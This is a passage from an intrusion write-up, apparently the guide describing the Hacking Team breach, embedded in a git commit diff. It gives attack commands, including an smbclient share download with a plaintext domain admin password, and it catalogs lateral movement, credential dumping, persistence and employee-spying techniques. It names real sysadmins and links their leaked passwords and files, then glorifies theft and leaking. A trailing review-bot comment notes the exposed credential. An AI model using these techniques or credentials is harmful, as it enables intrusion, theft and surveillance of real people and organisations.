-ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}
|
||||
|
||||
with New-MailboxExportRequest to download the new emails (in this case all
|
||||
mail since June 5). The problem is it says the date is invalid if you
|
||||
try a day larger than 12 (I imagine because in the US the month comes first
|
||||
and you can't have a month above 12). It seems like Microsoft's engineers only
|
||||
test their software with their own locale.
|
||||
|
||||
[1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
|
||||
|
||||
|
||||
--[ 12 - Downloading Files ]----------------------------------------------------
|
||||
|
||||
Now that I'd gotten Domain Admin, I started to download file shares using my
|
||||
proxy and the -Tc option of smbclient, for example:
|
||||
|
||||
proxychains smbclient '//192.168.1.230/FAE DiskStation' \
|
||||
-U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'
|
||||
|
||||
I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
|
||||
the torrent like that.
|
||||
|
||||
|
||||
--[ 13 - Introduction to hacking windows domains ]------------------------------
|
||||
|
||||
Before continuing with the story of the "weones culiaos" (Hacking Team), I
|
||||
should give some general knowledge for hacking windows networks.
|
||||
|
||||
|
||||
----[ 13.1 - Lateral Movement ]-------------------------------------------------
|
||||
|
||||
I'll give a brief review of the different techniques for spreading withing a
|
||||
windows network. The techniques for remote execution require the password or
|
||||
hash of a local admin on the target. By far, the most common way of obtaining
|
||||
those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
|
||||
and sekurlsa::msv, on the computers where you already have admin access. The
|
||||
techniques for "in place" movement also require administrative privileges
|
||||
(except for runas). The most important tools for privilege escalation are
|
||||
PowerUp [2], and bypassuac [3].
|
||||
|
||||
[1] https://adsecurity.org/?page_id=1821
|
||||
[2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
|
||||
[3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
|
||||
|
||||
|
||||
Remote Movement:

1) psexec

The tried and true method for lateral movement on windows. You can use
psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
invoke_psexec [4], or the builtin windows command "sc" [5]. For the
metasploit module, powershell empire, and pth-winexe [6], you just need the
hash, not the password. It's the most universal method (it works on any
windows computer with port 445 open), but it's also the least stealthy.
Event type 7045 "Service Control Manager" will appear in the event logs. In
my experience, no one has ever noticed during a hack, but it helps the
investigators piece together what the hacker did afterwards.

2) WMI

The most stealthy method. The WMI service is enabled on all windows
computers, but except for servers, the firewall blocks it by default. You
can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
wmic [5]. All except wmic just need the hash.

3) PSRemoting [10]

It's disabled by default, and I don't recommend enabling new protocols.
But, if the sysadmin has already enabled it, it's very convenient,
especially if you use powershell for everything (and you should use
powershell for almost everything, it will change [11] with powershell 5 and
windows 10, but for now powershell makes it easy to do everything in RAM,
avoid AV, and leave a small footprint)

4) Scheduled Tasks

You can execute remote programs with at and schtasks [5]. It works in the
same situations where you could use psexec, and it also leaves a well known
footprint [12].

5) GPO

If all those protocols are disabled or blocked by the firewall, once you're
Domain Admin, you can use GPO to give users a login script, install an msi,
execute a scheduled task [13], or, like we'll see with the computer of
Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
open the firewall.

[1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
[2] https://sourceforge.net/projects/winexe/
[3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
[4] http://www.powershellempire.com/?page_id=523
[5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
[6] https://github.com/byt3bl33d3r/pth-toolkit
[7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
[8] https://www.trustedsec.com/june-2015/no_psexec_needed/
[9] http://www.powershellempire.com/?page_id=124
[10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
[11] https://adsecurity.org/?p=2277
[12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
[13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py


"In place" Movement:

1) Token Stealing

Once you have admin access on a computer, you can use the tokens of the
other users to access resources in the domain. Two tools for doing this are
incognito [1] and the mimikatz token::* commands [2].

2) MS14-068

You can take advantage of a validation bug in Kerberos to generate Domain
Admin tickets [3][4][5].

3) Pass the Hash

If you have a user's hash, but they're not logged in, you can use
sekurlsa::pth [2] to get a ticket for the user.

4) Process Injection

Any RAT can inject itself into other processes. For example, the migrate
command in meterpreter and pupy [6], or the psinject [7] command in
powershell empire. You can inject into the process that has the token you
want.

5) runas

This is sometimes very useful since it doesn't require admin privileges.
The command is part of windows, but if you don't have a GUI you can use
powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1


----[ 13.2 - Persistence ]------------------------------------------------------

Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn't needed since companies never
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it's not needed and it increases the risk of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/


----[ 13.3 - Internal reconnaissance ]------------------------------------------

The best tool these days for understanding windows networks is Powerview [1].
It's worth reading everything written by it's author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
"net view". Other techniques that I like are:

1) Downloading a list of file names

With a Domain Admin account, you can download a list of all filenames in
the network with powerview:

Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
select fullname | out-file -append files.txt}

Later, you can read it at your leisure and choose which files to download.

2) Reading email

As we've already seen, you can download email with powershell, and it has a
lot of useful information.

3) Reading sharepoint

It's another place where many businesses store a lot of important
information. It can also be downloaded with powershell [10].

4) Active Directory [11]

It has a lot of useful information about users and computers. Without being
Domain Admin, you can already get a lot of info with powerview and other
tools [12]. After getting Domain Admin, you should export all the AD
information with csvde or another tool.

5) Spy on the employees

One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
(one of Hacking Team's sysadmins) gave me access to a Nagios server which
gave me access to the rete sviluppo (development network with the source
code of RCS). With a simple combination of Get-Keystrokes and
Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
[14], and GPO, you can spy on any employee, or even on the whole domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang


--[ 14 - Hunting Sysadmins ]----------------------------------------------------

Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important - the "Rete Sviluppo", an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I'd
already gotten admin access. Mauro Romeo's computer didn't have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he'd mounted it and then copied off the
files. Many have made fun of Christian Pozzi's weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/


--[ 15 - The bridge ]-----------------------------------------------------------

Within Christian Pozzi's Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I'd found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it's an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78


--[ 16 - Reusing and resetting passwords ]--------------------------------------

Reading the emails, I'd seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the "forgot my password" function along with
my access to their mail server to reset the passwords.


--[ 17 - Conclusion ]-----------------------------------------------------------

That's all it takes to take down a company and stop their human rights abuses.
That's the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.

Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don't attack systems you
don't have permission to, etc. I'll say the same, but with a more rebellious
conception of "ethical" hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves "ethical hackers" just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.

Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I'd like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.

[1] https://twitter.com/coracurrier/status/618104723263090688


--[ 18 - Contact ]--------------------------------------------------------------

To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

only encrypted email please:
https://securityinabox.org/es/thunderbird_usarenigmail

If not you, who? If not now, when?
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
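Review bot: the smbclient example in this file carries a plaintext domain credential in its -U argument, and the commit message ("1st import into tree") says nothing about where the eight imported files came from. For an archive import, add the source URL and a checksum per file to the message or a manifest, and mark this file as a known finding for secret scanning so the archived credential string is not re-triaged on every scan. With 20445 added lines and two file diffs suppressed as too large to render, one commit per zine would also make the import reviewable.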
4975
owned and exposed/2.txt
Normal file
File diff suppressed because it is too large
13117
owned and exposed/3.txt
Normal file
File diff suppressed because it is too large